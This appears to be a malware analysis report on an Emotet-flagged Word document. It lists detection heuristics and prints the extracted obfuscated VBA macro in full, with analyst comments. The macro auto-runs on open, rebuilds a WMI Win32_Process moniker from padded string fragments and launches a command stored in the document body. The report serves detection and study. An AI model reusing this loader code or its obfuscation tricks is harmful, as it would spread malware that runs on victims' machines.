MALICIOUS
172
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.EmotetRed0121-9822961-0 | critical | CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Downloader.EmotetRed0121-9822961-0
-
VBA macros detected | medium | 3 related findings | OLE_VBA_MACROS — Document contains VBA macro code
-
CreateObject call | high | OLE_VBA_CREATEOBJ — CreateObject call. Matched line in script:
Set Eziv8pdh0pqro9icda = CreateObject(Uwy26xcq5lc8ah) -
VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC — Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro | low | OLE_VBA_DOCOPEN — Document_Open macro. Matched line in script:
Private Sub Document_open() -
Suspicious extracted artifact | info | EXTRACTED_FILE_STATIC_TRIAGE — One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL | info | EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body). This is the standard Office Open XML DrawingML namespace identifier, not a network indicator for this sample.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13381 bytes |
SHA-256: 7ca0390109e782c9e8f55c38a4fff76a3a65e73dfc2917176ac58f2fea8cca42 |
|||
|
Detection
ClamAV (scan of this extracted artifact, not the parent document):
No threats found
Obfuscation or payload:
likely
105 of 195 identifiers look randomly generated (e.g. 'Zopwvl4zgh8e58h0fs') — consistent with name-mangling obfuscation.
|
|||
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "U07z0wxwvvexaf9"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-execution entry point: this handler sits in the ThisDocument module
' (VB_Base "1Normal.ThisDocument"), so Word runs it when the document is opened
' with macros enabled. Its only action is to call G1dnl_1ulce.
Private Sub Document_open()
G1dnl_1ulce
End Sub
Attribute VB_Name = "Sqrbtt3u7ee8a3hiw"
Attribute VB_Name = "Azexdgc4_qs24ty16"
' Main routine invoked by Document_open. It rebuilds an object name from string
' fragments padded with the marker "sg yw ah", passes it to CreateObject, and
' calls .Create on the result with a command string taken from the document
' body (V1) rather than from the macro source.
' With the marker removed the fragments read "winmgmt" + one character of
' Application.Name + ":win32_" + "p" + "rocess". NOTE(review): in Word that
' character is presumably "s", giving the WMI moniker for Win32_Process - confirm.
' The function assigns no return value.
Function G1dnl_1ulce()
' Runtime errors are suppressed from here on, so a failing step stays silent.
On Error Resume Next
' V1 = text of the document body (U07z0wxwvvexaf9 is the ThisDocument module).
' The two flanking names are not assigned anywhere in the visible listing.
V1 = Iju_yvxchibk + U07z0wxwvvexaf9.Content + Zqs62wtvzxypni
' Junk-code pattern used throughout this file: every GoTo jumps straight to the
' label that follows a Paragraph loop, so the loop is never executed. The loop
' is filler: Left(x, Len("xxx")) = "xxxx" compares 3 characters with a
' 4-character literal, and "saw" is never assigned in the visible listing.
GoTo CIRIIF
Dim NFkkpDEG As Paragraph
Set pwNooFhP = uCaoC
For Each NFkkpDEG In U07z0wxwvvexaf9.Paragraphs
Set wNVuFx = OySlFvzL
If Left(NFkkpDEG.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
CIRIIF = NFkkpDEG.Range.ListFormat.ListString
ElseIf InStr(NFkkpDEG.Range.Text, "kkiew") > 1 Then
EJfRnIbF = NFkkpDEG.Range.Text
EJfRnIbF = Replace(saw, "sjgwb", "hqkwjbjdasd" & CIRIIF)
NFkkpDEG.Range.Text = EJfRnIbF
Set NFkkpDEG.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set XbbiCC = LqQdB
Next NFkkpDEG
CIRIIF:
' Fragment "p" once the "sg yw ah" marker is removed.
U7 = "sg yw ahpsg yw ah"
' Fragment "rocess" once the marker is removed.
Ekhrpb5pv09i = "sg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah"
' Skipped filler block (same junk pattern as above).
GoTo nycVZr
Dim sQYNk As Paragraph
Set fNCREDkA = jUScFJ
For Each sQYNk In U07z0wxwvvexaf9.Paragraphs
Set dMkPJ = lYsLE
If Left(sQYNk.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
nycVZr = sQYNk.Range.ListFormat.ListString
ElseIf InStr(sQYNk.Range.Text, "kkiew") > 1 Then
RUVwZJHLn = sQYNk.Range.Text
RUVwZJHLn = Replace(saw, "sjgwb", "hqkwjbjdasd" & nycVZr)
sQYNk.Range.Text = RUVwZJHLn
Set sQYNk.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set ReiJFHOdJ = zbDaBH
Next sQYNk
nycVZr:
' Fragment ":win32_" once the marker is removed.
Jppibfk18hoqltzw8 = "sg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ah"
' Skipped filler block.
GoTo CYpaGHF
Dim LPFlNrIIG As Paragraph
Set szNEFZILD = QCrPTC
For Each LPFlNrIIG In U07z0wxwvvexaf9.Paragraphs
Set ynQdAGG = xVTPC
If Left(LPFlNrIIG.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
CYpaGHF = LPFlNrIIG.Range.ListFormat.ListString
ElseIf InStr(LPFlNrIIG.Range.Text, "kkiew") > 1 Then
tyjqEFI = LPFlNrIIG.Range.Text
tyjqEFI = Replace(saw, "sjgwb", "hqkwjbjdasd" & CYpaGHF)
LPFlNrIIG.Range.Text = tyjqEFI
Set LPFlNrIIG.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set bNztGGE = VxKiEZECj
Next LPFlNrIIG
CYpaGHF:
' Fragment "winmgmt" once the marker is removed.
Y8pxsco03vz = "wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ah"
' Skipped filler block.
GoTo HhIdGF
Dim PSuTIC As Paragraph
Set UYusHBGOB = lNxECJvF
For Each PSuTIC In U07z0wxwvvexaf9.Paragraphs
Set ASmolAA = JHyYGGE
If Left(PSuTIC.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
HhIdGF = PSuTIC.Range.ListFormat.ListString
ElseIf InStr(PSuTIC.Range.Text, "kkiew") > 1 Then
UkAIDHVI = PSuTIC.Range.Text
UkAIDHVI = Replace(saw, "sjgwb", "hqkwjbjdasd" & HhIdGF)
PSuTIC.Range.Text = UkAIDHVI
Set PSuTIC.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set FzygAJHO = VKvJBDFND
Next PSuTIC
HhIdGF:
' One character is borrowed from the host application's name instead of being
' written as a literal: Mid(Application.Name, 6, 1), wrapped in marker padding.
' NOTE(review): presumably "s" when the host is "Microsoft Word" - confirm.
Ib61wl_m8g_di2lm = "sg yw ahsg yw ah" + Mid(Application.Name, 3 + 3, 1 / 1) + "sg yw ahsg yw ah"
' Skipped filler block.
GoTo NZuPHJa
Dim OqbfwFU As Paragraph
Set KmYLLI = LGueAAX
For Each OqbfwFU In U07z0wxwvvexaf9.Paragraphs
Set lEaopAS = OalGIb
If Left(OqbfwFU.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
NZuPHJa = OqbfwFU.Range.ListFormat.ListString
ElseIf InStr(OqbfwFU.Range.Text, "kkiew") > 1 Then
LZnqxHzI = OqbfwFU.Range.Text
LZnqxHzI = Replace(saw, "sjgwb", "hqkwjbjdasd" & NZuPHJa)
OqbfwFU.Range.Text = LZnqxHzI
Set OqbfwFU.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set ZvKKRAG = TPVeEGhI
Next OqbfwFU
NZuPHJa:
' Assemble the still-padded object name from the five fragments, in order.
Nh_tciw9k1lg9 = Y8pxsco03vz + Ib61wl_m8g_di2lm + Jppibfk18hoqltzw8 + U7 + Ekhrpb5pv09i
' Skipped filler block.
GoTo mtbESE
Dim mUiPGCFF As Paragraph
Set GiwRHJ = sAiBQEEFF
For Each mUiPGCFF In U07z0wxwvvexaf9.Paragraphs
Set zAUSJlJ = bcpDTJk
If Left(mUiPGCFF.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
mtbESE = mUiPGCFF.Range.ListFormat.ListString
ElseIf InStr(mUiPGCFF.Range.Text, "kkiew") > 1 Then
XPbxJ = mUiPGCFF.Range.Text
XPbxJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & mtbESE)
mUiPGCFF.Range.Text = XPbxJ
Set mUiPGCFF.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set BhHxZJ = cjijAEGCB
Next mUiPGCFF
mtbESE:
' X6a6c8jnzkz strips the "sg yw ah" marker, leaving the real object name.
Uwy26xcq5lc8ah = X6a6c8jnzkz(Nh_tciw9k1lg9)
' Skipped filler block.
GoTo xnsPxEpW
Dim bJOfuB As Paragraph
Set WwVMuz = lCitGACAF
For Each bJOfuB In U07z0wxwvvexaf9.Paragraphs
Set PDGpRA = HboIEQ
If Left(bJOfuB.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
xnsPxEpW = bJOfuB.Range.ListFormat.ListString
ElseIf InStr(bJOfuB.Range.Text, "kkiew") > 1 Then
wzGTt = bJOfuB.Range.Text
wzGTt = Replace(saw, "sjgwb", "hqkwjbjdasd" & xnsPxEpW)
bJOfuB.Range.Text = wzGTt
Set bJOfuB.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set jjuvosEM = SlShq
Next bJOfuB
xnsPxEpW:
' This is the line the report's OLE_VBA_CREATEOBJ heuristic matched. The
' argument is a variable, so the object name never appears as a literal.
Set Eziv8pdh0pqro9icda = CreateObject(Uwy26xcq5lc8ah)
' Skipped filler block.
GoTo yRTNB
Dim IkThKWBXn As Paragraph
Set YzebOFJ = oNXNJIhAD
For Each IkThKWBXn In U07z0wxwvvexaf9.Paragraphs
Set ahzjFJI = qNWzIt
If Left(IkThKWBXn.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
yRTNB = IkThKWBXn.Range.ListFormat.ListString
ElseIf InStr(IkThKWBXn.Range.Text, "kkiew") > 1 Then
xKfkdBGYa = IkThKWBXn.Range.Text
xKfkdBGYa = Replace(saw, "sjgwb", "hqkwjbjdasd" & yRTNB)
IkThKWBXn.Range.Text = xKfkdBGYa
Set IkThKWBXn.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set NQnYHGBTy = kaJoHmI
Next IkThKWBXn
yRTNB:
' KK = document body text from character 4 onward with the marker stripped.
' The command is therefore stored in the document body, not in macros.bas;
' reviewing the macro source alone does not reveal it.
KK = X6a6c8jnzkz(Mid(V1, (4), Len(V1)))
' Calls .Create with KK; the other two arguments are not assigned in the
' visible listing. NOTE(review): if the object is WMI Win32_Process, the new
' process is typically parented by WmiPrvSE.exe rather than WINWORD.EXE -
' confirm in process telemetry.
Eziv8pdh0pqro9icda.Create KK, L65b6nd2_pvtc961y, Boftpfr2oqytf
' Skipped filler block.
GoTo zupkBKAAe
Dim CnUnIFYqR As Paragraph
Set MaaxJ = EameIeD
For Each CnUnIFYqR In U07z0wxwvvexaf9.Paragraphs
Set oUnrRKQ = lnEMB
If Left(CnUnIFYqR.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
zupkBKAAe = CnUnIFYqR.Range.ListFormat.ListString
ElseIf InStr(CnUnIFYqR.Range.Text, "kkiew") > 1 Then
cwYdtI = CnUnIFYqR.Range.Text
cwYdtI = Replace(saw, "sjgwb", "hqkwjbjdasd" & zupkBKAAe)
CnUnIFYqR.Range.Text = cwYdtI
Set CnUnIFYqR.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set cPWWG = ZoiCFJGD
Next CnUnIFYqR
zupkBKAAe:
End Function
' Pass-through wrapper around Zopwvl4zgh8e58h0fs: copies its argument to a
' local, hands it to Zopwvl4zgh8e58h0fs, and returns that result unchanged.
' Only three statements are live; everything between a GoTo and its label is
' filler that is jumped over.
Function X6a6c8jnzkz(A3q8sxt0s84duate6k)
' Runtime errors are suppressed for the rest of the function.
On Error Resume Next
' Skipped filler block: the GoTo jumps directly to the label after the loop.
GoTo lglXE
Dim xAtxD As Paragraph
Set HhiglJrQ = YAkOzGC
For Each xAtxD In U07z0wxwvvexaf9.Paragraphs
Set hwnAtm = DiDuDC
If Left(xAtxD.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
lglXE = xAtxD.Range.ListFormat.ListString
ElseIf InStr(xAtxD.Range.Text, "kkiew") > 1 Then
clXSjg = xAtxD.Range.Text
clXSjg = Replace(saw, "sjgwb", "hqkwjbjdasd" & lglXE)
xAtxD.Range.Text = clXSjg
Set xAtxD.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set ykiTAHc = dDdLFPyq
Next xAtxD
lglXE:
' Live statement 1: copy the input string.
Oik9tcwhxnhq5 = A3q8sxt0s84duate6k
' Skipped filler block.
GoTo SNUEDDADB
Dim UkCRGsFGT As Paragraph
Set XQnhLmMwg = RdoNf
For Each UkCRGsFGT In U07z0wxwvvexaf9.Paragraphs
Set HpqFFEQpE = rsTgUC
If Left(UkCRGsFGT.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
SNUEDDADB = UkCRGsFGT.Range.ListFormat.ListString
ElseIf InStr(UkCRGsFGT.Range.Text, "kkiew") > 1 Then
CYWzxBFCC = UkCRGsFGT.Range.Text
CYWzxBFCC = Replace(saw, "sjgwb", "hqkwjbjdasd" & SNUEDDADB)
UkCRGsFGT.Range.Text = CYWzxBFCC
Set UkCRGsFGT.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set FsrrMDA = yxYlOHEG
Next UkCRGsFGT
SNUEDDADB:
' Live statement 2: remove the "sg yw ah" marker via Zopwvl4zgh8e58h0fs.
Lkem2rbnt9w = Zopwvl4zgh8e58h0fs(Oik9tcwhxnhq5)
' Skipped filler block.
GoTo aqAlAFCIZ
Dim PszRGyvC As Paragraph
Set YaYgJAGHD = wKiwC
For Each PszRGyvC In U07z0wxwvvexaf9.Paragraphs
Set RkIXSJ = ZJbIGAQIB
If Left(PszRGyvC.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
aqAlAFCIZ = PszRGyvC.Range.ListFormat.ListString
ElseIf InStr(PszRGyvC.Range.Text, "kkiew") > 1 Then
OpKsQCC = PszRGyvC.Range.Text
OpKsQCC = Replace(saw, "sjgwb", "hqkwjbjdasd" & aqAlAFCIZ)
PszRGyvC.Range.Text = OpKsQCC
Set PszRGyvC.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set HRVFm = tgIiDKoQI
Next PszRGyvC
aqAlAFCIZ:
' Live statement 3: return the cleaned string.
X6a6c8jnzkz = Lkem2rbnt9w
' Skipped filler block.
GoTo MtyUqjD
Dim gmJLv As Paragraph
Set cpGtEDX = ZhruqEfqo
For Each gmJLv In U07z0wxwvvexaf9.Paragraphs
Set fndAGAJE = fERYDGT
If Left(gmJLv.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
MtyUqjD = gmJLv.Range.ListFormat.ListString
ElseIf InStr(gmJLv.Range.Text, "kkiew") > 1 Then
nTnGLtNW = gmJLv.Range.Text
nTnGLtNW = Replace(saw, "sjgwb", "hqkwjbjdasd" & MtyUqjD)
gmJLv.Range.Text = nTnGLtNW
Set gmJLv.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set oUPsjBDY = EtoSDPI
Next gmJLv
MtyUqjD:
End Function
' String de-obfuscator: returns the input with every occurrence of the marker
' "sg yw ah" replaced by Uatpdt1pwkbhgqvcr. That name is not assigned anywhere
' in the visible listing, so it is presumably Empty and the marker is simply
' deleted - confirm against the full module.
' The single Replace call is the only live statement; the six Paragraph loops
' are filler that each GoTo jumps over. Unlike the other two functions, this
' one has no On Error Resume Next.
Function Zopwvl4zgh8e58h0fs(Rnyt6dvvfgp3ew)
' Skipped filler block: the GoTo jumps directly to the label after the loop.
GoTo nmGWBH
Dim cUzBLI As Paragraph
Set rRNcE = NBtgBDbG
For Each cUzBLI In U07z0wxwvvexaf9.Paragraphs
Set zgFOAiG = vxvjCHFbl
If Left(cUzBLI.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
nmGWBH = cUzBLI.Range.ListFormat.ListString
ElseIf InStr(cUzBLI.Range.Text, "kkiew") > 1 Then
vVifA = cUzBLI.Range.Text
vVifA = Replace(saw, "sjgwb", "hqkwjbjdasd" & nmGWBH)
cUzBLI.Range.Text = vVifA
Set cUzBLI.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set RXPfHwB = QnFGnEBf
Next cUzBLI
nmGWBH:
' Skipped filler block.
GoTo YJfnsFEE
Dim lRMjf As Paragraph
Set PhJQzGB = UuAlgyo
For Each lRMjf In U07z0wxwvvexaf9.Paragraphs
Set XbtjbAqJ = nUVrDGKU
If Left(lRMjf.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
YJfnsFEE = lRMjf.Range.ListFormat.ListString
ElseIf InStr(lRMjf.Range.Text, "kkiew") > 1 Then
RXQUeGF = lRMjf.Range.Text
RXQUeGF = Replace(saw, "sjgwb", "hqkwjbjdasd" & YJfnsFEE)
lRMjf.Range.Text = RXQUeGF
Set lRMjf.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set axmnQIAP = RzlLgHDHI
Next lRMjf
YJfnsFEE:
' Skipped filler block.
GoTo tmWlsCu
Dim WIUEGc As Paragraph
Set zQHBG = ruvjLV
For Each WIUEGc In U07z0wxwvvexaf9.Paragraphs
Set MkMzBCFI = gNpzdH
If Left(WIUEGc.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
tmWlsCu = WIUEGc.Range.ListFormat.ListString
ElseIf InStr(WIUEGc.Range.Text, "kkiew") > 1 Then
ZGIMIWDCI = WIUEGc.Range.Text
ZGIMIWDCI = Replace(saw, "sjgwb", "hqkwjbjdasd" & tmWlsCu)
WIUEGc.Range.Text = ZGIMIWDCI
Set WIUEGc.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set aEDCpyH = IgXxH
Next WIUEGc
tmWlsCu:
' The only live statement: strip the "sg yw ah" padding and return the result.
' The marker string is a stable static indicator for this obfuscation layer.
Zopwvl4zgh8e58h0fs = Replace(Rnyt6dvvfgp3ew, "sg yw ah", Uatpdt1pwkbhgqvcr)
' Skipped filler block.
GoTo lEoUDAu
Dim gSxbEB As Paragraph
Set WnQtpICKz = vAyYkXRIP
For Each gSxbEB In U07z0wxwvvexaf9.Paragraphs
Set MIffeL = qsEZCJY
If Left(gSxbEB.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
lEoUDAu = gSxbEB.Range.ListFormat.ListString
ElseIf InStr(gSxbEB.Range.Text, "kkiew") > 1 Then
TJzKIdF = gSxbEB.Range.Text
TJzKIdF = Replace(saw, "sjgwb", "hqkwjbjdasd" & lEoUDAu)
gSxbEB.Range.Text = TJzKIdF
Set gSxbEB.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set lopVAHIAW = NeDsS
Next gSxbEB
lEoUDAu:
' Skipped filler block.
GoTo FWCrM
Dim iGdrUGZ As Paragraph
Set yyPnWCzx = mhyjG
For Each iGdrUGZ In U07z0wxwvvexaf9.Paragraphs
Set QwRtFIA = IHoSHE
If Left(iGdrUGZ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
FWCrM = iGdrUGZ.Range.ListFormat.ListString
ElseIf InStr(iGdrUGZ.Range.Text, "kkiew") > 1 Then
keihB = iGdrUGZ.Range.Text
keihB = Replace(saw, "sjgwb", "hqkwjbjdasd" & FWCrM)
iGdrUGZ.Range.Text = keihB
Set iGdrUGZ.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set FJKkPeC = QTZzFBG
Next iGdrUGZ
FWCrM:
' Skipped filler block.
GoTo WkcYDC
Dim fIaIiBXFF As Paragraph
Set tEQdJ = HhkdJOA
For Each fIaIiBXFF In U07z0wxwvvexaf9.Paragraphs
Set UIVSDP = WRrcXC
If Left(fIaIiBXFF.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
WkcYDC = fIaIiBXFF.Range.ListFormat.ListString
ElseIf InStr(fIaIiBXFF.Range.Text, "kkiew") > 1 Then
OniMG = fIaIiBXFF.Range.Text
OniMG = Replace(saw, "sjgwb", "hqkwjbjdasd" & WkcYDC)
fIaIiBXFF.Range.Text = OniMG
Set fIaIiBXFF.Range.ParagraphStyle = U07z0wxwvvexaf9.Styles("Normal")
End If
Set aJBDmCCF = IrsLEBNT
Next fIaIiBXFF
WkcYDC:
End Function
|
|||